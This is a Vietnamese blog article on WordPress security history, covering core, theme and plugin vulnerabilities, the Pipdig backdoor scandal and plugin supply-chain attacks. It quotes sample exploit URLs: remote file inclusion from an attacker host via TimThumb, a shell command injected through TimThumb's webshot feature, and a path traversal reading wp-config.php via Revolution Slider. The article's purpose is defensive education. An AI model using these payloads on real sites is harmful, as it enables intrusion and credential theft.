WordPress có an toàn? Các sự cố bảo mật nghiêm trọng trên WordPress

WordPress là mã nguồn Website phổ biến số 1 thế giới nhiều năm nay.

Thậm chí trong năm 2019, nó còn chiếm tới hơn 30% số lượng Website toàn thế giới!

Trong thế giới Website, tiên phong là những ông kẹ như Java, .NET (Microsoft), Python, Ruby on Rails… được tin dùng cho những Website lớn, với khả năng xử lý dữ liệu lớn, bảo mật cao…

Nhưng, khi Website trở thành một cuộc cách mạng kết nối toàn bộ thế giới với nhau thì các Website với Java, .NET hay Python, Ruby on Rails … không phải là món hàng dễ tiếp cận cho nhu cầu phổ thông. Vì:

• Chi phí xây dựng – bảo trì quá tốn kém
• Thời gian hoàn thiện dự án dài
• Người dùng ‘không chuyên’ không có nhiều cơ hội để hiểu cách thức vận hành hay can thiệp vào thiết kế – tính năng của website, …

Các CMS ra đời để phục vụ cho nhu cầu ‘quản trị & xuất bản nội dung’ trên Website, đáp ứng các tiêu chí của những dự án website ‘phổ thông’:

1. Chi phí xây dựng & vận hành – bảo trì & nâng cấp thấp
2. Thời gian hoàn thiện dự án nhanh vì đa số các tính năng đều đã xây dựng sẵn trong phần core + được bổ sung bằng vô số phần mở rộng (extension, module, plugin)
3. Dễ dùng, cho phép người dùng có thể tùy biến thiết kế & tính năng mà không cần chuyên môn về lập trình hoặc thiết kế.
4. Tối ưu SEO
5. Mã nguồn mở (Open Source)
6. Cần tài nguyên máy chủ ít

Bài viết thuộc Chuyên đề bảo mật Website chuyên nghiệp – Khóa học Pro WordPress Master!

1. WordPress chiếm 1/3 Websites toàn cầu

WordPress ra đời muộn hơn các CMS khác như OpenCMS, PHP-Nuke, Drupal, Mambo,…và ban đầu chỉ được xem là một nền tảng dành cho blog, nó không được xem là một CMS mạnh mẽ như các anh em cùng viết bằng PHP khác như Joomla hay Magento.

Nhưng với sự phát triển đột phá nhờ sự linh động – khả năng tích hợp – tùy biến cực kỳ mạnh mẽ, WordPress đã trở thành CMS số 1 thế giới – một nền tảng tạo Web dành cho mọi người!

Theo trang web uy tín W3Techs, tính đến tháng 3 năm 2019:

• WordPress chiếm 33.7% Web platform toàn cầu, chiếm 60% thị phần CMS.
• Mã nguồn mẹ của WP là PHP chiếm 79% toàn cầu, trong khi ASP.NET chiếm 11%, Java chiếm 4%, còn Ruby chỉ 2.5%.

Điều đáng nói là tốc độ phát triển của WordPress vẫn thuộc hàng cao nhất thế giới dù nó đã chiếm lĩnh một phần quá lớn rồi.

Tóm tắt lại như thế, để thấy rằng, vì sao WordPress lại trở thành chủ đề chính trong các cuộc tranh luận về bảo mật Website – và vì sao nó luôn là kẻ bị chỉ điểm đầu tiên!

2. WordPress có an toàn?

Nếu bạn hỏi câu này trên một Group IT, thì phiên chợ sẽ lập tức sôi động ngay, với cả ngàn lý do lý trấu đã được nhắc đi nhắc lại: giữa phe trả lời ‘đúng – WordPress dễ bị hack‘ và phe còn lại với câu trả lời ‘còn tùy‘.

Câu hỏi ‘Website WordPress có dễ bị hack‘ cũng tương tự như hỏi ‘chạy xe máy ở Sài gòn có dễ bị tai nạn không‘ vậy?

Đáp án có/ không không phù hợp với một vấn đề lớn như vậy.

Bạn thử tưởng tượng, WordPress chiếm 1/3 số Website lên đến cả tỷ của toàn thế giới.

Nếu bạn là bộ đội cụ Hồ với hai trái lựu đạn trên tay, bạn sẽ ném vào toán lính 20 thằng trên đường hay toán lính 2 thằng?

WordPress phổ biến chừng nào, thì hacker sẽ tập trung tấn công mạnh chừng đó.

Không thể sống thiếu Hacker

Như hai mặt của một vấn đề, không có mã nguồn nào 100% an toàn cả:

Khi bạn tạo ra một đoạn code – bạn cũng đồng thời tạo ra một vấn đề bảo mật

Nên, sẽ chẳng có cách nào tuyệt đối an toàn trong bảo mật Website – và cả các site dùng Java, .NET, Python… cũng vậy, chẳng cụ nào miễn nhiễm với súng đạn cả.

Website WordPress có dễ bị hack không, nó phụ thuộc vào cách chúng ta phòng chống thế nào. Và tương tự tai nạn giao thông, đôi lúc, không thể tránh khỏi nếu tai bay vạ gió.

Rất nhiều các Website WordPress lớn và Website của những người dùng WordPress có kinh nghiệm chưa bao giờ bị hack, bởi vì họ áp dụng những phương pháp bảo mật giúp tránh được hầu hết các cách tấn công phổ biến.

Các sự cố bảo mật nghiêm trọng trên WordPress

Trước khi liệt kê các sự cố bảo mật nghiêm trọng của WordPress, chúng ta nên tìm hiểu một vấn đề mà tất cả các phần mềm hệ thống, phần mềm máy tính – ứng dụng web – hay mã nguồn website đều gặp phải: cơn ác mộng Zero-Day!

3. Cơn ác mộng Zero-Day (0-day Vulnerability)

Zero-Day là gì?

0-day hay Zero-day là tên gọi một lỗ hổng bảo mật trên phần mềm mà lỗ hổng này không được phát hiện bởi ‘nhà phát triển, tester, hay chuyên gia bảo mật whitehat’ trước khi ‘hacker’ lợi dụng nó để tấn công gây hại cho đối tượng sử dụng.

Zero-day rất ‘dị thường’, nó là một lỗ hổng nghiêm trọng nào đó ‘tồn tại’ sẵn trên mọi phần mềm mà ‘phe ta’ chưa thấy được, nó chỉ cần chờ cho ‘phe địch’ phát hiện thì lập tức bật dậy và tuyên bố ‘Ta là lỗ hổng Zero-day’.

Vì sao gọi là lỗ hổng Zero-day (0-day vulnerability)

Thuật ngữ Zero-day ám chỉ rằng hacker có thể lợi dụng lỗ hổng chưa được bên ‘nhà phát triển, tester, hay chuyên gia bảo mật whitehat’ phát hiện để thực hiện các cuộc tấn công gây hại trong vòng chưa đến 1 ngày.

Tức trong thời gian chưa đến 1 ngày này, ‘phe ta’ không thể phản ứng kịp thời để tung ra bản vá được.

Cần tránh hiểu nhầm Zero-day là lỗi xảy ra trong 1 ngày, vì thông thường thời gian tồn tại của các lỗ hổng xếp vào loại Zero-day có thể lên đến 1 năm (đó là thời gian tính từ lúc hacker phát hiện lỗ hổng đến lúc nó được fix).

Thị trường giao dịch ngầm của Hacker mũ đen, mũ xám, chuyên gia an ninh mạng tập đoàn, tổ chức chính phủ… luôn có các cuộc giao dịch buôn bán các lỗi Zero-day trên phấn mềm, ứng dụng, website.

Với các mã nguồn Web – đặc biệt là CMS, các lỗi Zero day có thể gây thiệt hại rất lớn vì số đối tượng bị tấn công sẽ rất nhiều – lên đến hàng triệu Websites.

Trong WordPress, ngoài WordPress core, thì các themes & plugins cũng không thể tránh khỏi các lỗ hổng Zero-day.

Nên, việc theo dõi tình hình bảo mật, cập nhật WordPress, themes, plugins ngay khi có các bản update vá lỗi bảo mật (Security fixes) là điều cực kỳ cần thiết!

4. Các lỗ hổng bảo mật trên WordPress Core

Mã nguồn WordPress được sở hữu bởi tập đoàn Automattic, những bản cập nhật được tung ra liên tục: để bổ sung tính năng – cải thiện hiệu năng & nhất là các bản vá lỗ hổng bảo mật.

Automattic là công ty tỷ đô – qui tụ những nhà phát triển và chuyên gia bảo mật hàng đầu – được trợ giúp bởi cộng đồng bảo mật toàn cầu, với những chuyên gia bảo mật hàng đầu thế giới – từ các công ty như SiteLock, CloudFlare, Sucuri, WordFence…

Điều đáng mừng là càng ngày, hậu quả của các lỗ hổng bảo mật trên WordPress core càng được giảm thiểu – vì được xử lý & tung ra bản vá nhanh chóng nhờ sự trợ giúp rất đắc lực từ cộng đồng người dùng và chuyên gia bảo mật.

Một số lỗ hổng bảo mật đáng chú ý từng xuất hiện trên mã nguồn WordPress.

4.1 XML-RPC Brute Force & DDos Attack (2014 – nay)

XML-RPC là một tính năng được bật sẵn trên mã nguồn WordPress. XML-RPC không chỉ có trên WordPress, mà còn có trên nhiều CMS và mã nguồn khác, với tính năng cho phép kết nối ứng dụng từ các thiết bị khác nhau qua một file XML mã hóa.

Từ năm 2015, hacker đã lợi dụng phương thức system.multicall của XML-RPC để thực hiện các truy vấp dò mật khẩu quản trị.

Nôm na là, hacker sẽ gởi tới XML-RPC một lệnh đòi hỏi phải login quyền Adminstrator, lợi dụng phương thức system.multicall , hacker có thể gởi kèm lệnh đó cùng với vài trăm cặp user/pass khác nhau.

Nên phương thức tấn công này có cường độ gấp trăm lần so với cách tấn công Brute Force Attack qua trang login (ten-mien/wp-admin, ten-mien/wp-login.php,…).

Cách tấn công này cũng không thể chặn bằng phương pháp đổi đường dẫn đăng nhập hoặc Two Authentication, Captcha Checkbox… Vì tính năng XML-RPC khi bật có thể gởi request trực tiếp mà không cần qua bất cứ lớp bảo mật thông thường nào.

Cường độ tấn công lớn, lỗ hổng XML-RPC còn được dùng cho mục đích tấn công từ chối dịch vụ (DDos).

Đây không còn là lỗ hổng Zero-day vì đã có các phương pháp phòng chống bằng cách tắt toàn bộ hoặc một phần tính năng XML-RPC trên hosting, hoặc bằng plugin WordPress.

4.2 Sự cố ‘kinh điển’ – Blog của Reuters bị hack (2012)

Được xem là ví dụ kinh điển về nguy cơ bị hack khi sử dụng các phiên bản WordPress cũ, đặt biệt là các phiên bản đã được cảnh báo về lỗ hổng bảo mật trong cộng đồng WordPress.

Tương tự BBC, Reuters cũng là một thương hiệu khủng dùng WordPress cho blog của họ, và dù đã bị hack nhưng họ vẫn tiếp tục dùng cho đến giờ.

Vào tháng 8/2012 hacker đã hack và đăng tin giả lên blog của Reuters, nội dung là một cuộc phỏng vấn với một thủ lĩnh phiến quân ở Syria, sau đó nó được gỡ xuống rất nhanh.

Tin này chấn động cộng đồng bảo mật thế giới, và WordPress nhanh chóng bị qui kết là tội đồ dẫn đến lỗi này.

Nhưng, rất nhanh sau đó, WordPress Security Team (thuộc Automattic) đã phát hiện ra blog của Reuters đang dùng phiên bản cũ của WordPress – là 3.1.1 – phiên bản đã được cộng đồng bảo mật cảnh báo rộng rãi về một lỗ hổng nguy hiểm và yêu cầu người dùng update từ lâu.

Rất tiếc là webmaster của Reuters vì lí do nào đó mà bỏ qua cảnh báo này, để rồi họ bị hack một cách rất dễ dàng khi WordPress đã ra tới tận phiên bản 3.4.1!

Một sự kiện ‘kinh điển’ để nhắc mọi người nhớ rằng luôn update WordPress lên latest là công việc bắt buộc.

4.3 Lỗ hổng trên WordPress 5.0.x (2019)

Cuối tháng 3/ 2019 (mới đây thôi), các phiên bản WordPress 5.0.x bị phát hiện một lỗ hổng bảo mật nghiêm trọng cho phép hacker thực hiện các cuộc tấn công Stored XSS.

Lợi dụng lỗ hổng này, hacker có thể lừa những user có quyền từ Administrator đến Editor nhấp vào một link để thực hiện tấn công CSRF (những người dùng có đủ quyền đăng comment với các thẻ html).

Khi bị lừa nhấp vào link độc, Editor -> Administrator có thể thực thi một lệnh để đưa mã độc vào vào code – và Website sẽ chứa mã độc để thực thi các cuộc tấn công Stored XSS!

Vậy lỗ hổng này – sẽ giúp hacker tấn công CSRF trước – và qua tấn công CSRF, mã độc sẽ được đưa vào code nhằm tấn công Stored XSS!

Tất nhiên, bản update 5.1.1 đã nhanh chóng fix lỗi này. Phần còn lại phụ thuộc vào người dùng, nếu họ vẫn không chịu update lên 5.1.x thì chẳng trách ai được nữa!

Tham khảo:

Lỗ hổng XSS &CSRF trên WordPress 5.0.x

5. Các sự cố bảo mật trên Themes & Plugins nổi tiếng

5.1 Cái chết của Timthumb (2011 – 2014)

Timthumb từng là một trong những plugin phổ biến nhất thế giới, như Yoast SEO, iThemes hay Contact Form 7…

Nó cũng là cái tên mà cộng đồng bảo mật WordPress không muốn nhắc lại.

Timthumb là plugin giúp resize ảnh thumbnail trong WordPress, một nhu cầu hầu như bắt buột phải có trên mọi Website WordPress. Trước đây vì có sẵn plugin TimThumb quá tốt nên rất nhiều plugins và themes tích hợp luôn cho người dùng thay vì phải code riêng tính năng này.

Tương tự các plugin nổi tiếng hiện nay, TimThumb được tích hợp vào rất nhiều themes và plugins nổi tiếng, có thể kể đến Woo Themes, ElegantThemes, Templatic, các plugin tạo Gallery ảnh, Slider…

Tháng 8/2011, cộng đồng bảo mật công bố một lỗ hổng Zero-day, giúp hacker có thể thực thi một file .php đặt trên bất kỳ servers nào bên ngoài (với tên miền mạo danh các dịch vụ lưu trữ ảnh nổi tiếng):

http://wpkube.com/wp-content/plugins/wordpress-gallery-plugin/timthumb.php?src=http://picasa.com12345.dyndns.org/file-doc-hai.php 

File file-doc-hai.php nằm trên server của hacker (http://picasa.com12345.dyndns.org) có thể làm nhiều thứ như chèn mã độc, xóa – chỉnh sửa – thêm file vào Server của nạn nhân.

Nó là 0-day Vulnerability – tức là khi cộng đồng bảo mật phát hiện ra lỗ hổng, hacker đã tấn công càng quét cả triệu Website WordPress lớn bé.

Timthumb đã ra mắt bản vá sau đó, nhưng vì nỗi ám ảnh quá lớn, các plugin thay thế như đã ra đời, nhiều themes lớn cũng tự code tính năng resize thumbnail thay vì kiếm giải pháp từ plugins bên thứ 3.

Một số người dùng vẫn còn sử dụng TimThumb vì họ tin rằng, sau sự cố này đội ngũ phát triển của TimThumb sẽ rút kinh nghiệm và plugin sẽ an toàn hơn.

Nhưng, niềm tin đã đăt nhầm chỗ, tháng 6/2014, một lỗ hổng (lại là) Zero-day tiếp tục được công bố sau khi đã tấn công và gây thiệt hại nặng nề.

Đó là lỗ hổng trong tính năng ‘Webshot’ của chính Timthumb, lỗ hổng này lại mời hacker thực thi các tác vụ phá hoại tương tự như Zero-day cách đó 4 năm:

http://vulnerablesite.com/wp-content/plugins/pluginX/timthumb.php?webshot=1&src=http://vulnerablesite.com/$(rm$IFS/tmp/a.txt)

Lỗ hổng này giúp hacker thực hiện lệnh xóa – chỉnh sửa hoặc tạo bất kỳ file nào nằm trên Server chứa Website.

Và, lần này, những kẻ cả tin cuối cùng cũng tỉnh ngộ. Timthumb đã chính thức ‘tạch’ khỏi cộng đồng WordPress!

5.2 Revolution Slider & cơn đau tim của Themeforest (2014 – 2016)

Revolution Slider, cùng với Visual Composer là một trong những plugin trả phí được dùng nhiều nhất trong WordPress, một là vì nó quá mạnh mẽ để tạo ra các slider ấn tượng cho Website, hai là nó được tích hợp sẵn trên hầu hết các themes bán trên Themeforest – chợ theme số 1 thế giới!

Vì có mặt trên ‘hầu hết’ themes ở Themeforest, nên lỗ hổng bảo mật trên Revolution Slider năm 2014 đã khiến toàn bộ Themeforest chao đảo.

Lỗi bảo mật tồn tại ở các phiên bản 4.1.x, cho phép truy cập trực tiếp file wp-config.php theo đường dẫn sau:

domain/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Trong WordPress, file wp-config.php chứa các thông tin về database (prefix – name – user – pass) và thông tin về key bảo mật.

Với các thông tin này, Hacker có thể hack vào Database và thực hiện các cuộc tấn công nghiêm trọng khác.

Từ những theme khủng như Avada, The7, Flatsome, X-Theme… cho đến các themes mới ra mắt đều nằm trong danh sách nguy hiểm vì tích hợp sẵn Revolution Slider.

Điều đáng nói, tác giả của Rev Slider là Theme-punch phải mất vài ngày mới xác nhận lỗ hổng và tung ra bản cập nhật. Khiến chỉ trong thời gian ngắn đó, hàng trăm nghìn website bị tấn công và chèn mã độc.

Nhiều năm sau, lỗ hổng này còn gây thiệu hại: vì những người dùng Revolution Slider bản cũ, hoặc những website bị tấn công năm 2014 không kiểm tra và quét code triệt để.

5.3 Lỗ hổng bảo mật trên Tagdiv Themes (2016-2018)

Năm 2016, 2 theme khủng của Tagdiv là Newsmag và Newspaper by Tagdiv gặp 2 sự cố bảo mật lớn khiến hacker có thể chèn code để thực hiện redirect tới các trang độc hại qua một file Js.

Mức độ ảnh hưởng của lỗ hổng này còn kéo dài đến tận cuối năm 2018, vì hàng chục ngàn websites vẫn dùng các phiên bản cũ hơn 6.7.2 (phát hành cuối 2016).

Newspaper by Tagdiv, Newsmag by Tagdiv, cũng như các theme khủng Avada, The7, Flatsome, Betheme … chúng ta đều biết mức độ chia sẻ rộng rãi thế nào, nhưng không phải ai cũng nghĩ tới việc mua/ xin bản mới để update sau một thời gian dài sử dụng.

Tham khảo:

Lỗ hổng bảo mật trên Tagdiv themes & Ultimate Member

5.4 Lỗ hổng SQL Injection trên Duplicate-Page 2019

Đừng nhầm lẫn với plugin Duplicate-Page với plugin Duplicate Page and Post đã bị gỡ khỏi WP Repository (đọc cuối bài để biết nguyên nhân).

Duplicate-Page là plugin rất nổi tiếng, được đánh giá gần 4.5 sao và có trên 800 nghìn lượt kích hoạt. Tác giả của nó cũng rất uy tín với hàng loạt plugin khủng khác như File Manager, Theme Editor,…

Trong phiên bản 3.3.x, Duplicate-Page, phương thức dt_duplicate_post_as_draft có tham số $post_id không có cơ chế loại bỏ các thông thông tin input độc hại, nên có thể bị hacker lợi dụng để tấn công theo phương thức SQL Injection.

Lỗ hổng này đã được fix ngay trong phiên bản 3.4, nhưng hacker đã lợi dụng nó tấn công số lượng lớn Website và sẽ còn nhiều sites khác trở thành nạn nhân vì không update lên 3.4!

5.5 Các lỗ hổng bảo mật nghiêm trọng khác 2018

Ngoài các sự cố bảo mật nêu trên, trong năm 2018 & đầu năm 2019, rất nhiều plugin dính các lỗ hổng Zero-day, nên nếu bạn còn dùng các phiên bản cũ, hãy update ngay nhé:

WordPress GDPR 1.4.2 trở xuống

WordPress GDPR là một trong các plugin HOT nhất năm 2018 – hỗ trợ khai báo tuân thủ các qui định của luật GDPR ở EU (luận về bảo mật thông tin người dùng).

Tuy nhiên, các phiên bản từ 1.4.2 trở xuống chứa một lỗ hổng bảo mật cho phép hacker thay đổi cấu hình Admin và thay đổi Site URL để trỏ về các site độc hại.

Lỗi này gây ảnh hưởng khá nghiêm trọng vì thời điểm đó hàng chục ngàn Website đang kích hoạt GDPR plugin.

Tác giả đã fix lỗ hổng này trong phiên bản 1.4.3!

AMP for WP phiên bản từ 0.9.97.20 trở xuống

Plugin giúp tích hợp AMP cho WordPress nổi tiếng (và tốt nhất) AMP for WP phiên bản 0.9.97.20 trở xuống chứa lỗ hổng bảo mật, cụ thể là không xác thực quyền User khiến hacker có thể chèn code html, js hoặc quảng cáo vào header & footer của website.

Nghiêm trọng đến mức nó phải tạm thời gỡ khỏi WP Repository để fix lỗi.

Các phiên bản 0.9.97.21 trở đi đã vá lỗ hổng này.

Lỗ hổng RFI trên Duplicator phiên bản thấp hơn 1.2.42

Lỗ hổng không nằm trên plugin Duplicator, mà nằm trên file installer.php trong thư mục gốc của website – sinh ra khi tạo bản backup & thực hiện restore một bản backup.

Sau khi restore thành công, thì file installer.php này vẫn còn ở đó – cho phép hacker khai thác lỗ hổng trên file này để xóa hoặc viết lại file cài đặt wp-config.php!

Với trên 1 triệu Website kích hoạt Duplicator, rất nhiều Websites được biết đã bị hack và phá hoại trước khi tác giả của plugin fix hoàn toàn lỗi này với phiên bản 1.2.42.

Tham khảo: Cách hack Website qua RFI – Remote File Inclusion

Ultimate Member Vulnerability 2018

Plugin nổi tiếng để tạo Membership Website này được phát hiện lỗi bảo mật lớn với các phiên bản dưới 2.0.22!

Lỗ hổng bảo mật cho phép Hacker upload một file .php dưới dạng một image vào thư mục wp-content/uploads/ultimatemember/temp , sau đó thực hiện các cuộc tấn công redirect hoặc chèn quảng cáo vào website.

Lỗi này – rất đáng nói – được phát hiện cùng tác giả với thủ phạm tấn công Tagdiv Themes trong giai đoạn 2016 – 2018 đã đề cập ở trên!

6. Các lỗ hổng bảo mật nghiêm trọng khác 2019

Trong năm 2019, các lỗ hổng “Zero-day” vẫn tiếp tục được cộng đồng bảo mật WordPress phát hiện và giúp tác giả fix lỗi nhanh chóng.

Tất nhiên, vì là “Zero-day” nên trước khi được fix bằng các bản update, nó đã tấn công gây hại cho hàng nghìn Websites.

Lỗ hổng RFI trên hàng loạt plugin nổi tiếng

Đầu năm 2019, hàng loạt cuộc tấn công qua phương thức RFI – Remote File Inclusion diễn ra trên nhiều plugin nổi tiếng là Social Warface, Yuzo Related Posts, Easy WP SMTP và Yellow Pencil Visual Theme Customizer.

Điều đáng nói là file được dùng để tấn công từ xa 4 plugin trên được đặt cùng một nơi là hellofromhony(.)com! Tức các cuộc tấn công được khai thác bởi một người hoặc tổ chức.

Cụ thể, các phiên bản chứa lỗ hổng RFI là:

• Social Warface 3.5.2 trở xuống
• Yuzo Related Posts: mọi phiên bản – chưa có bản vá nên đã bị gỡ khỏi WP Repository
• Yellow Pencil Visual Theme Customizer phiên bản 7.2.0 trở xuống
• Easy WP SMTP phiên bản 1.3.9.0 trở xuống

Các bạn hãy update ngay nếu còn dùng phiên bản cũ. Riêng Yuzo Related Posts thì hãy tạm thời gỡ bỏ khỏi Website – chờ tác giả update hoặc tìm plugin thay thế.

Tham khảo cụ thể về các lỗ hổng này trên WordFence:

Zero-day Attack Yellow Pencil & Others

7. Scandal bảo mật Pipdig P3 – ‘Lật mặt’ phiên bản 2019

Scandal của Pipdig giúp người dùng nhận ra rằng bảo mật không chỉ là chống ‘phe địch’ mà nó còn có thể xuất phát từ những kẻ biến chất từ ‘phe ta’.

Pipdig là một thương hiệu WordPress nổi tiếng với những theme chuyên cho Foodie, Lifestyle blog, magazine. Theme của họ load nhanh – cực nhẹ – thiết kế tinh tế.

Pipdig cùng Organic Themes, WP-Zoom và StudioPress,… là những thương hiệu thống trị trong thị phần theme dành cho blog ẩm thực – phong cách sống.

Cộng đồng Foodie, Lifestyle blogger đánh giá rất cao Pipdig vì họ có những sản phẩm giúp khách hàng tạo nên những website ấn tượng – hái ra tiền.

Cho đến khi….

Mọi việc bắt đầu từ giữa tháng 3/2019. Một Freelancer ở Anh là Jem Turner phát hiện có backdoor trong plugin tích hợp trong các theme của Pipdig – P3 plugin (Pipdig Power Pack)!

Backdoor này cho phép Pipdig có thể truy cập vào Dashboard với quyền Admin mà chủ website không thể biết được.

Nhưng – sự kiện chỉ trở thành Scandal qua cách họ lý giải về backdoor và những gì cộng đồng bảo mật WordPress phát hiện thêm sau đó.

Rằng: họ chèn backdoor để login hỗ trợ người dùng khi có sự cố kỹ thuật – vì không phải người dùng nào cũng biết cách tạo user & phân quyền để họ login hỗ trợ…Ặc!!!

Cách lấp liếm ngô nghê này khiến các chuyên gia bảo mật chú ý và họ đào sâu thêm mọi thứ. Những gì phát hiện sau đó thực sự đáng xấu hổ:

Pipdig còn chèn code vào P3 plugin để đánh lừa người dùng – lợi dụng người dùng để thực hiện các truy vấn nhằm tấn công DDos đối thủ của họ trên thị trường theme blog, lifestyle

Trò bẩn DDos của Pipdig Power Pack plugin

Qua tính năng giả mạo trên plugin gọi là Checking the CDN cache, họ sẽ gởi một request đến một file nằm trên Server của Pipdig, đích đến cuối cùng của request này là https://kotrynabassdesign.com/wp-admin/admin-ajax.php!

Như vậy bất kỳ website nào đang kích hoạt Pipdig Power Pack plugin đều sẽ gởi một request tới file admin-ajax.php của Kotryna Bass Design, tạo ra các đợt tấn công DDos qui mô nhỏ liên tục vào website này.

Cô gái xinh đẹp tài năng – Kotryna Bass, chủ nhân của thương hiệu theme cùng tên, cũng không thể ngờ mình bị chơi bẩn. Chỉ đến khi J. Turner thông báo chi tiết thì Kotryna Bass mới liên hệ nhà cung cấp hosting và được xác nhận có nhiều đợt DDos vào file admin-ajax.php!

Ai bảo em đã xinh đẹp mà còn quá tài năng mà chi!!!

Nhưng Kotryna Bass chỉ là 1 trong số các nạn nhân, vì với chiêu thức ném đá giấu tay này, Pipdig có thể lợi dụng Website của khách hàng để DDos bất kỳ web nào họ thích.

Hồi kết của một thương hiệu Theme nổi tiếng

Cũng như mọi tay ‘mất dạy’ khác, chủ nhân của Pipdig cũng lấp liếm với nhiều lý do mà càng nói càng lộ.

Cuối cùng họ bịt tai bịt mắt không phản hồi mọi liên hệ. Và sau đó là im lặng luôn trước yêu cầu Refund của hàng ngàn khách hàng!

Dù, hiện tại Pipdig vẫn còn để nguyên mọi thứ như chưa có gì xảy ra. Nhưng, trong thời đại này, với một Scandal động trời như vậy, có thể nói:

Pipdig là một thương hiệu đã chết – họ tự giết mình bằng cách lợi dụng khách hàng và chơi bẩn đối thủ

Tham khảo toàn bộ Scandal của Pipdig P3 tại đây:

Pipdig P3 Backdoor Scandal

8. Khi Developer bán mình!

Một thủ đoạn cao tay của hacker là bỏ tiền ra mua luôn cả Developer!

Các chuyên gia bảo mật đã phát hiện nhiều plugins được sang tay cho ‘đối tác thứ 3’ một cách âm thầm, thông báo rất mập mờ chung chung từ ‘đối tác thứ 3’ này.

Khi tìm kiếm theo địa chỉ cung cấp của ‘đối tác thứ 3’ chỉ xuất hiện những thông tin chẳng hề dính dáng gì tới WordPress hay những lĩnh vực tương tự. Nhưng: khi đào sâu hơn, nhiều ‘đối tác thứ 3’ – dùng thông tin cung cấp khác nhau, thì đều dẫn về một nguồn rất thân thuộc với thế giới hacker.

Sau khi Developer âm thầm bán mình, thì themes, plugin thuộc về tay hacker, họ sẽ ra mắt ngay một phiên bản mới kèm ‘backdoor’ và người dùng không thể nghi ngờ gì được.

Đến khi các chuyên gia bảo mật phát hiện ra backdoor thì hàng chục ngàn Website đã bị hack, chưa kể số lượng lớn hơn nếu không theo dõi tin tức về bảo mật, vẫn kê gối ngủ ngon sau khi cài các plugin này.

Cuối năm 2017, cộng đồng bảo mật phát hiện 3 plugin nổi tiếng có trên WordPress Repository bị chèn Backdoor để hack thực hiện các cuộc tấn công SEO Spam và chèn cloaked backlinks:

1. Duplicate Page and Post với hơn 50.000 lượt kích hoạt
2. No follow All External Links – hơn 9.000 lượt kích hoạt
3. WP no External Links – hơn 30.000 lượt kích hoạt

Cả 3 plugin này sau đó được nhà phát triển thông tin rằng họ đã bán cho ‘bên thứ 3 – cũng hoạt động trong lĩnh vực WordPress’.

Nhưng, như đã nói ở trên, bên thứ 3 không hề có thông tin gì đáng tin cậy.

Mấu chốt là các chuyên gia bảo mật sau khi phân tích Backdoor của 3 plugin trên, đều dẫn về một cùng 1 địa chỉ IP – tức cả 3 vụ ‘bán mình’ trên đều có cùng một người mua. Mục đích là để thực hiện tấn công SEO Spam, cloaked backlinks, và sau đó có thể còn nhiều loại khác nếu như cộng đồng bảo mật không phát hiện ra.

Hậu quả là 3 plugin đều chính thức bị gỡ khỏi WP Repository cuối năm 2017. Nhưng kác hacker đã học thêm 2 phương thức tấn công mới:

1. Mua đứt luôn developer để cài backdoor và phát tán.
2. Hoặc tự phát triển một plugin có tính năng hữu ích, đưa lên WP Repository – sau một thời gian sẽ âm thầm cài backdoor.

Kinh nghiệm phòng bị là:

• Hãy tìm hiểu về tác giả trước khi cài một plugin miễn phí nào từ WP Repository, hoặc khi mua một plugin nào đó.
• Đừng bao giờ tin vào các plugin ‘nổ’ về các tính năng SEO tự động, đi backlinks tự động, tạo nội dung tự động,  kiếm tiền nhanh… bạn 99% sẽ trở thành nạn nhân để Hacker kiếm chác bằng cách chèn malware SEO Spam, quảng cáo, affiliate…
• Đừng dùng các plugin được tặng theo kiểu ‘Freebies’ từ các trang web không có uy tín trong cộng đồng.
• Khi Plugins hoặc Themes bị gỡ bỏ khỏi WP Repository – nghĩa là nó đã bị phát hiện các hành vi mờ ám. Nên đừng bao giờ cố dùng các plugin này, hãy tìm các plugin uy tín khác thay thế.

Bài viết về việc ‘bán mình’ của tác giả 3 plugin trên:

Three Plugins Backdoored in Suppy Chain Attack

 

Tổng kết

Hơn 30% tổng Websites trên thế giới hiện nay dùng WordPress, nên vấn đề bảo mật WordPress lúc nào cũng nóng hổi – cuộc chiến không hồi kết giữa Developer và Hacker.

Khi một phiên bản mới WordPress, Themes, Plugins được phát hành – những lỗ hổng tìm năng trở thành Zero-Day cũng xuất hiện.

Hãy luôn luôn cập nhật các phiên bản mới của WordPress core, Themes, Plugins để kịp thời phòng chống các cuộc tấn công vào lỗ hổng bảo mật.

Tất nhiên, kèm theo các biện pháp bảo mật khác, được trình bày ở topic tiếp theo…!